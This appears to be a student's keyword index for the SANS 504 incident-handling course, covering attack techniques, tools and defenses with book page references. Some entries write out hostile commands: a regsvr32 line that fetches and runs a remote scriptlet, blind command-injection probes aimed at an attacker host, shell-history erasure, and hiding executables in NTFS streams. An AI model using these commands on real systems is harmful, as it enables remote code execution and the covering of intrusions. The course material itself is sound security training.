SANS 504 Hacker Tools, Techniques & Incident Handling cheat sheet

The document provides a comprehensive overview of various cybersecurity concepts, tools, and attack techniques, including account harvesting, ARP cache poisoning, and backdoor exploits. It discusses methods for detecting and defending against these attacks, as well as the evolution of attack trends such as hacktivism and the use of bots. Additionally, it highlights the importance of application whitelisting and continuous monitoring in modern security practices.

Uploaded by dhj2y2bffy

Keyword (Book, Page): Remarks

!exploitable (Book 3, p. 108): Automated crash-analysis tool made by Microsoft that estimates how exploitable a given flaw is
.sct files (Book 3, p. 154)
.sct files, running one (Book 3, p. 155): regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll
/etc/passwd (Book 4, p. 36): see Unix Password File Format
/etc/shadow (Book 4, p. 37): see Unix Shadow File Format

Account Harvesting (Book 4, p. 84):
The ability to discern valid user IDs
--By observing how the server responds to valid vs. invalid authentication requests
Attackers automate harvesting through scripts
--Using a shell scripting tool such as wget
Script-based harvesting depends on the format of the user ID:
--Numeric
--User specified

Account Harvesting: Defenses (Book 4, p. 89):
Preparation:
--All authentication error messages must be consistent
--User IDs should be tracked for a given number of bad logins and then the account temporarily locked out
----Account lockout could be timed to restore access after 30 minutes or require a call to the help desk
----Be careful about the cost of help desk calls for account lockout resets
--Slow down authentication and verification responses
----Wait 5+ seconds for verification, then get longer as the failed logins/checks mount
----This can be on a per-IP / User-Agent string basis
Identification:
--Frequent login attempts with no activity even after successful login
Contain, Erad, Recov: N/A

Accounting Entries: UNIX (Book 5, pp. 84, 85):
Unix systems have four files better known as the accounting entries
--utmp, wtmp, and btmp are not stored in ASCII; they are binary files
--lastlog is stored in different manners on various systems
They can be edited only using specialized tools:
--remove.c, wtmped.c, marry.c, cloak.c, logwedit.c and wzap.c

Ack Scans (Book 2, p. 94): Particularly useful in getting through simple router-based firewalls. If a router allows "established" connections in (and is not using any stateful inspection), an attacker can use ACK scans to send packets into the network.
**See NMAP-Ack Scanning
ACK Storms (Book 3, p. 69): If an attacker spoofs packets in a session, sequence numbers will be wrong
--Both sides try to sort out the "confusion", resulting in an ACK storm
Active Server Pages (Book 2): Microsoft's answer to CGI
Add N Edit Cookies - Browsers (Book 4, p. 137): Free Firefox plug-in (Specialized Browsers for Manipulating Data)
Aircrack-ng (Book 2, p. 64): Crack WEP keys
Alternate Data Streams (NTFS) (Book 5, p. 100): See Covering Tracks: Alternate Data Streams (NTFS)
Altering the Kernel (Book 5, p. 59):
To implement a kernel-mode rootkit, an attacker tweaks the kernel in two ways, identified as elements A and B in the figure: System call table and Evil Kernel Module (S_execve Wrapper)
By changing the system call table, an attacker can wield great power:
--Planting malicious code inside the kernel
--Implementing redirection
----You want to run one program, but the kernel runs a different one
--Hiding files and processes

Alureon (Book 5, pp. 77-78):
Kernel-mode rootkit
--Alters Windows device drivers associated with the file system
----atapi.sys or iastor.sys
--Alters the driver, but changes the system so that the driver signature check always passes
--Hides itself in unused space at the end of the drive
--Encrypted using RC4
Analysis of Perimeter and Host Perimeter Detects (Book 1, p. 56): View Diagram
Application Whitelisting (Book 3, p. 150): Is the future
--Attackers are starting to get used to it
--The good old days of AV blacklisting are at an end
--May take a while to complete
Application-Level Detection (Identification) (Book 1, p. 58):
Application logs are especially useful from
--Web apps
--App server for the thick client
--Cloud-based services
Particularly useful data
--Dates
--Timestamps
--Users (especially admins)
--Actions and transactions, including user input variable values

Application-Level Trojan: Backdoor Suites (Book 5, p. 9):
Allow for the complete control of a victim system remotely across the network
Client-server architecture
Very popular and many examples:
--Poison Ivy, VNC, Dameware (commercial), Sub7, BlackShades, GhostRAT
--Many common backdoors can self-install upon system exploit
--Payload option in Metasploit
Attackers can trick the victim into running the tool
Most of these tools can be discovered with an antivirus tool.
Apply Fixes (Lessons Learned) (Book 1, p. 129): Based on what you learned, get appropriate approval and funding to fix your processes and technology, and improve incident-handling capabilities
ARP (Book 3, p. 48): Maps IP to MAC
ARP Cache Poisoning (Book 3, pp. 51, 52):
Step 1: The attacker sets up IP forwarding so all packets sent to the attacker's machine are redirected to the default gateway (router) for the LAN. The attacker's machine therefore acts much like the router itself
Step 2: The attacker sends a gratuitous ARP message to the victim machine, mapping the IP address of the default gateway for the LAN to the attacker's MAC address. The victim's ARP cache is therefore poisoned with false information.
Step 3: The victim sends traffic, but it's all transmitted to the attacker's machine because of ARP cache poisoning
Step 4: The attacker sniffs the info using a sniffer
Step 5: The attacker's machine forwards all the packets back through the switch to the default gateway

ARP scans (Book 2, p. 94): Identify which hosts are on the same LAN as the machine running Nmap.
***The ARP scan does not work through a router, because ARP traffic just goes onto a single LAN
Arp spoof (Book 3, p. 49): Manipulate IP-to-MAC address mapping
--Feeds false ARP messages into a LAN so traffic is directed to the attacker for sniffing --> ARP Cache Poisoning
ARP: Gratuitous (Book 3, p. 49): Gratuitous ARPs: Anyone can send ARP responses even though no one sent an ARP Request
--ARP cache poisoning
Arpspoof (Book 3, p. 51): Manipulate IP-to-MAC address mapping
--Feeds false ARP messages into the LAN so traffic is directed to the attacker for sniffing -> ARP cache poisoning
ARPWatch (Book 3, p. 75): Looks for gratuitous ARP
ASLEAP (Book 2, p. 64): ASLEAP provides a dictionary-based attack against the LEAP protocol used in some wireless environments
atapi.sys (Book 5, p. 77): Driver modified by Alureon
Attack - Defense (aka Metasploit Additional Defenses - Preparation) (Book 3, p. 133):
Strictly control outgoing traffic
Start a "hunting team" looking for attack indicators. Hunt the hunters
--Check for long URLs
--Check for DNS entries
--Check for beacon connections
--Check for odd services and .exes
Webcast on topic (Seth Misenar and Eric Conrad): Continuous Monitoring

Attack Trends (Book 2, p. 4): Five steps that represent the flow of an attack from initial information gathering to "you are owned"

Attack: General Trends (Book 2, p. 10):
Excellent communication through the computer underground
--Chat, web, informal groupings, and hacker conferences
Rise of Hacktivism
--Hacking to make a political point
--Not just web-site tampering
Ransomware

Attack: General Trends - Attacks for Fun and PROFIT (Book 2, p. 11):
Computer crimes generally for profit, sometimes for hacktivism
How to make money on malicious code
--Sell the code for backdoors/bots
--Spam and web-based advertising
--Pump and dump stock schemes
--Phishing: e-mail, phone, and targeted (spear) phishing
--Denial of Service extortion
----Not just porn and gambling sites as targets any more
--Keystroke loggers stealing financial information
--Rent out armies of infected systems for all of the above
--RAM scrapers pulling CC numbers off POS terminals
Attack: General Trends - Gold Age (Book 2, p. 14):
The marriage of general attack tools and worms, viruses, and bots is resulting in powerful techniques
--Worms are increasingly being used to carry bots, backdoors, password crackers, and scanners
--Botnets are growing large with self-replicating code
--Several active botnets with more than 1 million hosts
Attacks from multiple sources simultaneously
--Distributed, cooperative attacks are all the rage
--Using groups of coordinating attackers or a single attacker with a botnet
Bottom line: It's a good time to be an attacker (or security practitioner)

Attack: General Trends - Software Distro Site Attacks (Book 2, p. 12):
Hack into web and file-sharing sites and alter software to include a backdoor
--Everyone who downloads and uses the tool is impacted
Another approach is embodied in the ISR-Evilgrade tool
--Listens for software to request an update
--Sends a response with malware
--Currently includes modules for Java browser plug-ins, WinZip, WinAmp, Mac OS X, OpenOffice, iTunes, LinkedIn toolbar, and more
--More than 60 software packages in total whose Internet updates can be subverted this way

Attacking WPAD (Book 3, p. 74):
Where a system automatically attempts to find a system with the name WPAD and download a PAC file with proxy settings.
--MITMf and Responder
Intercept traffic for specific domains (think PAC backdoors) and harvest full HTTPS URL information for things like session IDs
Pacdoor is a tool that attacks WPAD

Automated Search Engine (Book 2, p. 43):
Bishop Fox's SearchDiggity is a fantastic suite that includes Google Diggity, Bing Diggity, and other search capabilities
--Malware Diggity, Data Loss Prevention Diggity, Flash Diggity
--Many of these "diggity" components require an API for the respective service
--Sometimes, free APIs provide fewer results than the web interface
Recon-ng is another powerful automated search tool

Avatar Rootkit (Book 5, p. 68):
Uses the driver infection technique twice
--Once to bypass Host-Based Intrusion Detection (HIDS)
--The second is for persistence
* Uses the bootkit method to bypass driver signing requirements
* Attempts to detect whether the target system is a VM
--If not installed as Admin, it will automatically attempt local privilege escalation
--Does not infect the same driver on every system; chooses at random
----It is able to infect system drivers without altering their size
--Custom encryption used for Command and Control (C2)
Back Door Factory (BDF) and BDF Proxy (Book 3, p. 53): Intercepts executable files and automatically backdoors them in transit
Backdoor Capabilities (Book 5, p. 15):
System control:
--Log keystrokes, get passwords
--Create dialog boxes with attacker's text
--Lock up or reboot the machine
--Get detailed system information
--Access files
--Create VPN through compromised systems
--Camera and audio capture
Many of the same features found in Meterpreter
Many will have names that "blend in" on the system
--SCSI, UPS, server, client, host, and svchost
Backdoors (Book 5, p. 6): Allows an attacker to bypass normal security controls on the system. It allows an attacker to get around them so he doesn't have to provide a user ID and password

Backdoors and Trojan Horses (Book 5, p. 6):
Two techniques used by attackers to maintain their access into a system
Numerous attacks utilize Backdoors and Trojan Horses
A backdoor is a program that allows an attacker to access a system, bypassing security controls
A Trojan Horse is a program that looks innocuous but is actually sinister
Some backdoors are also Trojan Horses
--Example: an innocuous-looking program that is actually a Netcat listener
--Rootkit components mimic standard operating system parts
--Important email attachment that contains a bot
Bad UserID (Book 4, p. 85): see screenshot

BeEF - Browser Exploitation Framework (Book 4, p. 113):
Uses an XSS hook to take interactive control of a victim browser
--Port Scanner
--Visited URLs (history grabber)
--Software inventory
--Alter current web page view in browser (deface page)
--Deliver Metasploit exploit to another target
Bell-LaPadula Model (Book 4, p. 116): No write down, and no read up. This stops info leakage but it does allow for malware infection
Bettercap (Book 3, p. 51): Ruby framework used to manipulate ARP mapping on the targeted systems and gateways. Also supports a wide variety of other attacks. Automatically discovers targets, ARP cache poisons them, then runs multiple different parsers and interception tools to hijack the traffic. Has the ability to manipulate TCP data on the fly

BGP Hijacking (Book 3, p. 8):
--Allows routing across the internet
--Autonomous System Numbers (ASNs) define IP addresses per router
--If there is an overlap, routers will route to the more specific ASN
--An attacker who either has compromised an ISP or can inject routes (think nation-states) can broadcast malicious routes and reroute traffic
--Hard to detect; looks very similar to router misconfiguration issues
BGP Hijacking Defense (Book 3, p. 9): Know what normal traceroute information looks like
--Can be difficult as routes can change, but new routes should be sensible
--Train your users to identify potentially hijacked sessions (browser error, drop)
Bishop Fox's SearchDiggity (Book 2, p. 43): Bishop Fox's SearchDiggity is a fantastic suite that includes Google Diggity, Bing Diggity, and other search capabilities
Bloodhound (Book 2, p. 140): A tool which graphs the quickest way to get domain admin
Bot Distribution (Book 4, p. 68): Attackers install bots in numerous ways: worm spread, carrying the bot as a payload, e-mail attachment duping users into running it, bundled with some useful application or game.
Bot DoS Suites (Book 4, p. 154): Bots allow execution of many DoS exploits at once
--Try all the different attacks, just to see if one crashes the target
--bonk, jolt, land, nestea, teardrop, newtear, syndrop, WinNuke

Bots (Book 4, p. 67):
Increasingly, worms are used to deliver bots
--Maintaining backdoor control of a machine
--Controlling an IRC channel (one of the earliest and most popular uses of bots)
--Acting as a mail relay
--Providing anonymizing HTTP proxies
--Launching DoS floods
*Spread through worms, email attachments, downloads, app embedding

Bots - Fast Flux (Book 4, p. 70): Rapid switching of bot controller
--Accomplished through a DNS server friendly to the attacker
--Adds extra layers of obscurity
Bots: Communication (Book 4, p. 69):
IRC on standard ports (TCP 6667)
IRC on nonstandard ports (such as TCP 3000 or TCP 3333)
WASTE (distributed peer-to-peer communications)
HTTP to one or more websites
Social networking site profiles: Twitter, YouTube, Google documents, etc.

Bots: Communication Channels (Book 4, p. 69):
IRC on standard ports (TCP 6667)
IRC on nonstandard ports (such as TCP 3000 or TCP 3333)
WASTE (distributed peer-to-peer communications)
HTTP to one or more websites
Social networking site profiles: Twitter, YouTube, Google documents, etc.
Bots: Functionality (Book 4, p. 73):
--Morph its code for file infection
--Run commands, start services, open shells/ports/etc.
--Add/remove/modify/copy files
--Scan and propagate
--Network sniff (passwords, email, etc.)

Browser Exploit Against SSL/TLS (BEAST) (Book 3, p. 66): Issue in TLS 1.0 and earlier, exploited using JavaScript in a browser to send encrypted messages with chosen plaintext and a related attack
Brute Force Attacks (Password Cracking) (Book 4, p. 12): Try every possible password until you are successful. The amount of time required for a brute force attack is heavily dependent on the complexity of the password encryption or hashing algorithm.
btmp file: Accounting Entries Unix (Book 5, p. 84): btmp: File contains bad login entries for failed login attempts
--Default location on Linux: /var/log/btmp, but not often used
Buffer Overflow (Book 3, p. 99): Allows an attacker to execute arbitrary commands on your machine
--Take over the system or escalate privileges
--Based on moving data around in memory without properly checking its size
--Same core issue (non-validated input) for heap and integer-based overflows
**Defense: add boundary checking to code; deny any request that exceeds the buffer limit
Buffer Overflow - Defenses (Book 3, p. 128): Use canaries and non-executable memory pages
--Make better code in general
Buffer Overflow Defenses (Book 3, p. 130): If you are a software developer:
--Always, always check the size of user input to make sure it fits
--Truncate data or give an error if it's too big
--User input from GUI, network, command line, environment variables... everywhere
Buffer Overflow Defenses (Book 3, p. 134):
Identification
--Unusual server crashes
--Execution of code from the stack
--IDS/IPS alerts
--Extra accounts appearing on the system
Containment
--Deploy non-executable system stacks
Erad: Apply patches when available
--If the system was compromised as admin/root, rebuild from original media and patches
Recovery:
--Carefully monitor the system after it is back in production

Buffer Overflow Defenses: Build-Time Preparation (Book 3, p. 127):
Configure the system so that no instructions can be retrieved from the stack
--Stops some buffer overflows, but not all
--Still useful on sensitive systems
Grsecurity at www.grsecurity.net
PaX at pax.grsecurity.net
SELinux at http://selinuxproject.org
Microsoft Enhanced Mitigation Experience Toolkit (EMET) helps address vulnerabilities in third-party software

Buffer Overflow Defenses: Preparation (Book 3, p. 126):
Patch management
Utilize a host-based IPS that offers buffer overflow protection by
--Blocking certain calls into the kernel from certain applications
--Offering additional memory protection to areas like the stack
Deploy application whitelisting software
Configure systems so that no instructions can be retrieved from the stack

Buffer Overflow Defenses: Programming (Book 3, p. 131):
Preparation
Avoid programming mistakes
--Know what buffer overflows are and how to avoid them
Awareness/training for developers
--Code reviews
Writing Secure Code 2 by Howard and LeBlanc
Secure Programming for Linux and UNIX HOWTO by David Wheeler

Buffer Overflow: Creating Exploit (Book 3, p. 106):
The three steps of the process of finding a flaw and creating an exploit are:
1) Find a potential buffer overflow condition
2) Push the proper executable code into memory to be executed
3) Set the return pointer so that it points back into the stack for execution

Buffer Overflow: Creating Exploit (Step 1) (Book 3, p. 107):
Search the binary for known weak function calls
--Use a debugger or strings
Use a tool for analyzing machine language code
--Find patterns consistent with buffer overflow flaws
--Metasploit's msfelfscan and msfpescan
Or if you have the source code, check that!
Buffer Overflow: Example (Book 3, p. 100): See screenshots.
--To avoid this type of problem, add bounds checking to the program. Because the "gets" function has no bounds checking, it should always be avoided. This could be fixed using the following syntax:
----fgets(bufferA, sizeof(bufferA), stdin);
Buffer Overflow: Exploiting (Book 3, p. 105): Two options
--Use an off-the-shelf exploit someone else already created
----Exploits available via exploit-db.com, packetstormsecurity.org
--Create a new exploit for a new vulnerability
Buffer Overflow: Finding Potential Buffer Overflows - Cram Input (Book 3, p. 109): Take a brute-force approach
--Shove a repeating pattern of arbitrarily long characters into every possible opening
--Look for a crash where the instruction pointer (EIP on x86/Intel) contains your pattern
--That means you were able to overflow a buffer and get your input into the instruction pointer
--In 2009, Microsoft released an automated crash-analysis tool called !exploitable that estimates how exploitable a given flaw is

Buffer Overflow: Known Weak Functions (Book 3, p. 107):
Search the binary for known weak function calls
--Use a debugger or strings
Use a tool for analyzing machine language code
--Find patterns consistent with buffer overflow flaws
--Metasploit's msfelfscan and msfpescan
Or if you have the source code, check that!
Look for functions such as:
--strcpy, strncpy, strcat, sprintf, scanf
--fgets, gets, getws, memcpy, memmove

Buffer Overflow: Smashing the Stack (Book 3, p. 104):
User data is written into the allocated buffer by the subroutine
If the data size is not checked, the RP (return pointer) can be overwritten by user data
The attacker's exploit places machine code in the buffer and overwrites the RP
When the function returns, the attacker's code is executed
Buffer Overflows: Cram Input Method: What to Cram (Book 3, p. 110): Crams a series of letters to peg down where in the sequence the overflow occurs. This tipping point becomes the start of your new RP
Buffer Overflows: File Parser (Book 3, p. 138):
Programs that open files also have parsers, many of which have buffer overflow flaws
By just reading a given file created by an attacker, the bad guy could crash an application or possibly execute commands; some applications that have a history of such flaws:
--WinZip, iTunes, WordPad
--Symantec, Trend Micro, and McAfee antivirus tools
--EnCase and Sleuth Kit forensics software
--Word, PowerPoint, Excel office tools
--Adobe Reader, Acrobat and Flash frequently have such flaws

Buffer Overflows: Return Pointer (Book 3, p. 113): The attacker doesn't know exactly which memory location the executable code is at
--Much of this depends on how the target program was compiled
--Determined at runtime, a guessing game
Buffer Overflows: Return Pointer NOP (Book 3, p. 114): Use a NOP sled to pad your exploit code.
--Now your RP doesn't have to be as precise
--Increases chances of IDS detection
Burp Proxy (Book 4, p. 139): Part of the Burp suite of web application assessment and pen testing tools. It runs in Java and has many useful features, including the capability to accept regular expressions, which it applies to finding and altering HTTP requests automatically in real time.

Cain (Book 4, pp. 23, 24):
War driving tools, akin to NetStumbler
Traceroute GUI
Sniffer for capturing user IDs and passwords
Hash calculator for MD2, MD4, MD5, SHA1, SHA2 and RIPEMD-160
Password representation calculator for LANMAN, NT, MySQL, and Cisco PIX
Network neighborhood exploration
Windows password hash dumper
ARP cache poisoning to redirect traffic
Remote promiscuous mode checker, such as Sentinel
VoIP sniffer, capturing traffic and converting it to a WAV file
RSA SecurID Token Generator (requires the token's ASC file)

Cain - Defenses: Preparation (Book 4, p. 31):
Get rid of LANMAN hashes on local systems
Disable LANMAN challenge/response authentication
Implement SYSKEY:
--Extra layer of encryption for the SAM database; protect your SAM database.
Cain and Abel (Book 4, p. 23): Cain gathers information about the local system (and sniffed data) and includes a nice GUI
--Abel runs in the background and allows remote dumping of information about a target

Cain as a Password Cracker (Book 4, pp. 25-26):
Microsoft LANMAN and NT hashes (stored in SAM and Active Directory)
LM challenge/response (passed across the network)
NTLMv1 and NTLMv2 (passed across the network)
Password List (PWL) files from Windows 95-98
Cisco-IOS Type 5, Cisco PIX
APOP MD5 hashes, CRAM MD5 hashes, RIPv2 MD5 hashes,
OSPF MD5 hashes, VRRP, Virtual Network Computing (VNC) 3DES, RADIUS Shared Secrets,
Microsoft SQL Server 2000 passwords, MySQL323 passwords, IKE preshared passwords
Cain: Config (Book 4, p. 27): See screenshot:
--Load dictionary files here.
--Configure guess permutation modes here for hybrid attacks
--Current status of the cracking attack shown here.
--Cain supports dictionary, brute-force, basic hybrid, and rainbow table password cracking

Cain: Cracking Passwords (Book 4, p. 28): see screenshot
After loading the password representation, selecting a dictionary, and configuring the options, the attacker can run Cain by clicking the "Start" button.
Cain: LANMAN Hashes (Book 4, pp. 16, 17, 18):
By default, both LANMAN and NT hashes are stored on Windows NT/2000/XP/2003
--On Windows 2000/XP/2003, passwords of 14 characters or less are hashed:
--Pad to exactly 14 characters
--Convert to all uppercase characters
--Split the 14 characters into two 7-character strings
--Use each 7-byte string as a DES key
** No salt, very weak

Cain: NT Hashes (Book 4, p. 19):
NT hash authentication is better, but not great
--Uppercase/lowercase are preserved (thankfully)
--Password is hashed using MD4 to create a 16-byte hash
--If the password is greater than 14 characters (that's 15 or more characters), no LANMAN hash is stored
For both LANMAN and NT hashes, no salts are used
--You can precompute a dictionary of hashed passwords

Cain: Password Formats (Book 4, pp. 25, 26):
Cain can crack numerous Windows password formats:
--Microsoft LANMAN and NT hashes (stored in SAM and Active Directory)
--LM challenge/response (passed across the network)
--NTLMv1 and NTLMv2 (passed across the network)
--Password List (PWL) files from Windows 95-98
--Cisco-IOS Type 5, Cisco PIX
--APOP MD5 hashes, CRAM MD5 hashes, RIPv2 MD5 hashes,
--OSPF MD5 hashes, VRRP, Virtual Network Computing (VNC) 3DES, RADIUS Shared Secrets,
--Microsoft SQL Server 2000 passwords, MySQL323 passwords, IKE preshared passwords
Canary (Book 3, p. 128): The system calculates the hash of code as it's pushed on the stack
--If the hash changes, the canary sounds the alarm
Canary - Terminator (Book 3, p. 128): Type of canary
Canary - XOR (Book 3, p. 128): reference
Carna Botnet (Book 4, p. 61): Fast-spreading worms
CGI Program (Book 2): Specification for interfacing server-executed programs with WWW pages. The web server executes the CGI program using input supplied by the client's HTTP request
--Called from the web client, but executes programs on the server
CGI/PHP/ASP/JSP runs (Book 2): The client requests a web page that triggers CGI; this generates an HTTP method, or filling in an HTML form generates an HTTP POST method.
--The web server executes the script/program and returns the output to the client

CGI/Web Scanners Defense (Book 2):
--Remove all default web material - HTML, CGI scripts, ASPs, images
--Apply all system and server patches
--Run the web server with minimal privileges (not root).
--Consider a chrooted environment
ID: Utilize an Intrusion Detection System
--Most CGI/Web scanners trip a lot of signatures.
Cheat Sheet Elements (Windows and Linux) (Book 1, p. 62): Have the system admins look for unusual:
--Processes and services
--Files
--Network usage
--Scheduled tasks
--Accounts
--Log entries
--Other unusual items
--Additional supporting (third-party) tools

clearev (Book 5, p. 111): Command in Meterpreter that wipes log files

Code Checking Tools (Book 3, p. 132):
Automated code-review tools can search for known weak functions and run heuristic checks to see if buffer usage is OK
Free automated code-checking tools for C and C++:
--RATS: Rough Auditing Tool for Security
--Flawfinder: dwheeler.com/flawfinder
Commercial code-analysis tools: Fortify Source Code Analyzer, Coverity Static Analysis, Klocwork Insight Pro, and GrammaTech's CodeSonar
Commercial binary-analysis tools

Code Search Engine Tools (Book 3, p. 108):
Various code search engine tools are available (koders.com is one of the most widely used); Google shut down its code search feature
Koders.com crawls the Internet to find source code
--C, C++, Perl, Python, Ruby, Java, and more
--Caches source code and allows for flexible searches

Command Injection (Book 4, pp. 91-93):
Allows remote code execution when the web app can be tricked into executing code supplied by the user
ShellShock
--Web apps either run a shell or a program to handle inputs
--If the input contains a command for the shell, an attacker may get that command to run
Use commands like ping and nslookup to test for the vulnerability
--These commands don't require privileges and apply to both Windows and Linux
--Difficult to detect because they are so benign
Commands for Counting (Book 4, p. 167): Various commands for counting the number of lines of output (use FIND on Windows, grep on Linux)
Command Injection - Defenses (Book 4, p. 94):
Preparation:
--Educate developers to be careful with user input
--Conduct vulnerability assessments and penetration tests regularly (Sanitize your input!!!)
Identification:
--Look for unusual traffic outbound from web servers
--Look for extra accounts or other configuration changes on servers
Containment:
--Remove attacker software and accounts
--Check for rootkits
--Fix the application, and consider a Web Application Firewall
Eradication:
--If a rootkit were installed, rebuild
Recovery: Watch for the attacker's return
Command Injection: Command to Inject (Book 4, pp. 92, 93):
To discover a command injection flaw, an attacker could choose from several commands to try
Some of the most valuable are:
--ping [AttackerIPaddress]
--nslookup [AttackerDomainName]
--The attacker can then sniff to see if packets come from the target
These commands are ideal because:
--They DO NOT require high privileges to execute and they are benign
--They show there is outbound traffic from the target
--Work in a blind fashion because the attacker can sniff to see if they worked without seeing the output of the command

Common Linux Rootkit Backdoor Components (Book 5, p. 49): see screenshots and Rootkits - User-Mode Linux
Common Linux Rootkit Hiding Components (Book 5, p. 50): see screenshot and Rootkits - User-Mode Hiding

Common Remote Control Backdoor Capabilities (Book 5, p. 15):
System control:
--Log keystrokes, get passwords
--Create dialog boxes with attacker's text
--Lock up or reboot the machine
--Get detailed system information
--Access files
--Create VPN through compromised systems
--Camera and audio capture
Many of the same features found in Meterpreter
Many will have names that "blend in" on the system
--SCSI, UPS, server, client, host, and svchost
Competitive Intelligence (Book 1, p. 158): Businesses routinely are involved in the activities of collecting information about their competition or trying to prevent the competition from getting information about their activities. As long as this is legal, we generally refer to this as Competitive Intelligence

Connect Scans (Book 2, p. 94): Complete the 3-way handshake; are slow and easily detected. Because the entire handshake is completed for each port in the scan, the activities are often logged on the target system.
Keywords Book Page Remarks
use Netflow data to reveal patterns in connection statistics
Connection Data - Systems beaconing out every 30 seconds
1 135 - Systems beaconing out at random intervals
(Enterprise-Wide IR)
- Connections which live for far longer than they should
The goal of the Containment phase is to stop the bleeding
sub-phases of Containment:
Containment 1 98 -short-tem = just to stop the damage
-System back-up
-long-tem = bad guy is denied access
-Denial of Service
-Compromised Information
-Compromised Asset
-Unlawful Activity
Containment- Incident - Internal Hacking
1 101
Categories -External Hacking
-Malware
-E-Mail
-Policy Violations

Containment - Inform Management (Book 1, p. 102)
Identify a senior management sponsor (CISO, CIO, Legal Counsel, etc.)
--Keeping management and the helpdesk in the loop alleviates problems down the road
-Make sure both take notes of their actions and observations

Containment - Initial Analysis (Book 1, p. 105)
Keep a low profile
-Avoid obvious-looking methods (ping, traceroute, nslookup)

Containment - Long Term (Book 1, p. 112)
After backups are made, we can start reconfiguring the system
--implement long-term containment and move toward recovery
Ideal: If the system can be kept offline, move to the Eradication phase
-Get rid of the attacker's stuff
Less-than-ideal, but sometimes necessary: If the system must be kept in production, perform long-term containment actions

Containment - Long Term Actions (Book 1, p. 113)
Numerous potential actions, including
- Patch the system
- Patch neighboring systems
- Insert Intrusion Prevention Systems (IPS) or in-line Snort
- Null routing
- Change passwords
- Alter trust relationships
- Apply firewall and router filter rules
- Remove accounts used by attacker
- Shutdown backdoor processes used by attacker
Containment - Notify and Track Incident (Book 1, p. 103)
Notify incident-handling team and managers
Remember vertical and horizontal reporting
-Inform management (of course)
-Inform impacted business unit, helpdesk, response teams, etc.
Create entry in incident tracking system
-CyberSponse is a commercial IR tracking system
-There's the free RTIR Incident Response Tracking tool
-The Orion Live CD includes templates, tracking forms, and more

Containment - Short-Term (Book 1, p. 106)
Try to prevent the attacker from causing more damage
--gather sound evidence through the image-creation process
Actions include: unplug power/network, isolate on VLAN, apply router/firewall/DNS changes to prevent traffic
--Word web bugs can help track the attack by identifying where your data is popping up

Containment - Characterize Incident (Book 1, p. 101)
Record category, severity, and sensitivity
*** Options listed on pg 101

Containment - Characterize Incident: Criticality (Book 1, p. 101)
1) Incident impacts critical systems: 60 min
2) Incident impacts non-critical systems: 4 hrs
3) Possible incident, non-critical: 24 hrs

Containment - Characterize Incident: Sensitivity (Book 1, p. 101)
Sensitivity: Who should be informed?
1) Extremely sensitive (CSIRT, mgmt)
2) Sensitive (CSIRT, mgmt, sys owners, ops)
3) Less sensitive (employees informed of isolated virus infection)

Containment - CyberCPR (Book 1, p. 104)
Web app for tracking IH and consolidating evidence
--allows formal notes
--hashes/encrypts all evidence uploaded
-includes secure comms

Containment - Deployment (Book 1, p. 100)
Deploy a small on-site team to survey the situation
-Typically same personnel as the Identification team
-Secure the area
-If possible, use preprinted survey form
Continue to Consult with System Owners (Containment) (Book 1, p. 114)
Keep system owners and administrators in the loop
*Don't play the "blame game"
- Never allow fault to be an issue during incident handling
- Assigning fault now closes down important avenues of investigation
- Sometimes, as you learn more, assumptions change
- Fault can be assigned during the Lessons Learned phase

Copyrights (Book 1, p. 180)
Protect works/content, particular expressions of ideas


Counting Half-Open Connections in Linux (Book 4, pp. 178-179)
Use the netstat and grep commands to count half-open connections

Counting Half-Open Connections in Windows (Book 4, p. 172)
Use the netstat and find commands to count half-open connections

Counting Running Processes in Linux (Book 4, pp. 176-177)
Use the ps command to list processes and the grep command to count them

Counting Running Processes in Windows (Book 4, p. 171)
Various commands for counting running processes in Windows (tasklist command with find command) (WMIC command)

Country-Specific Cyber Crime Laws (Book 1, p. 183)
-Traditional crimes facilitated by a computer
-Crimes in which the computer is the target
Always incorporate your organization's legal dept into any incident or interaction with law enforcement

Covering Tracks - Log Editing Defense (Book 5, p. 121)
Use a logging server
-Windows supports syslog, but tools are needed to convert the file type
--Evt2sys, Sl4nt, Kiwi, Snare Agent
Employ integrity monitoring: Mysyslog

Covering Tracks On the Network: ICMP Tunnels (Book 5, p. 119)
Numerous tools carry data inside the payloads of ICMP packets
--ptunnel (TCP over ICMP Echo and Reply), Loki (Linux shell), ICMP Shell (Linux), PingChat (Windows chat program), ICMPCmd (Windows cmd.exe access)

Covering Tracks: Accounting Entries (UNIX) (Book 5, pp. 84-85)
utmp, wtmp, and btmp are not stored in ASCII; they are binary files
-lastlog is stored in different manners on various systems
They can be edited only using specialized tools:
remove.c, wtmped.c, marry.c, cloak.c, logwedit.c and wzap.c

Covering Tracks: Alternate Data Streams (NTFS) (Book 5, p. 100)
smbclient can get data from ADS (Windows or Linux)
-Prior to Vista and Server 2008, there was no built-in way of finding or deleting a stream
--To delete a stream, you could move the file to a FAT partition, and then move it back
--On Vista, Win2008 and Windows 7, the dir /r option lists ADS
Will not show ADS behind Windows reserved filenames
--COM1, COM2, LPT2, AUX, etc.
*** LADS is a tool dedicated to finding ADSs in NTFS
-most AV doesn't scan ADS routinely

Covering Tracks: Editing Shell History Problems (Book 5, p. 82)
Shell history is written when the shell is exited
When editing the history, the command used to invoke the editor will be placed in the shell history file
The attacker could edit the file, exit the shell, start another shell, edit the history file again to remove it, but it will be added again!
--A chicken-and-egg problem
Solutions
1) Kill the shell, so that it can't write to the most recent shell history, including the command used to edit it
--# kill -9 [pid] ..or.. # killall -9 bash
2) Change the environment variable HISTSIZE (for bash) to zero
--# unset HISTFILE then kill -9 $$

Covering Tracks: Finding Hidden Streams (Book 5, p. 101)
Use an antivirus tool to find malicious code in streams (nearly all have it)
Many anti-spyware tools lack ADS detection functionality
Third-party tools for finding alternate data streams in NTFS
--LADS or Streams
Covering Tracks: Hiding Files (NTFS) (Book 5, p. 99)
NTFS supports alternate data streams
Multiple streams can be attached to each file or directory
Attacker's files can be hidden in a stream behind normal files on the system
--Such as notepad.exe or word.exe (or anything else)
Use the type command built into Windows to add an alternate data stream
--type hackstuff.exe > notepad.exe:stream1.exe
Or, use the cp program from the NT Resource Kit
--cp hackstuff.exe notepad.exe:stream1.exe
To get data back, it can be copied out of the stream
--cp notepad.exe:stream1.exe hackstuff.exe
Alternatively, you can create an alternate data stream attached to a directory by simply typing:
--notepad <file_or_directory>:<stream_name>
If you know the stream exists and you know its name, you can view its contents using the more command
--more < c:\file:stream1

Covering Tracks: Hiding Files in UNIX (Book 5, p. 77)
Easiest way to hide files is to name them something like "." or ".."
Attackers will disguise files and directories by naming them dot-space, dot-dot-space, dot-dot-dot, or even just space

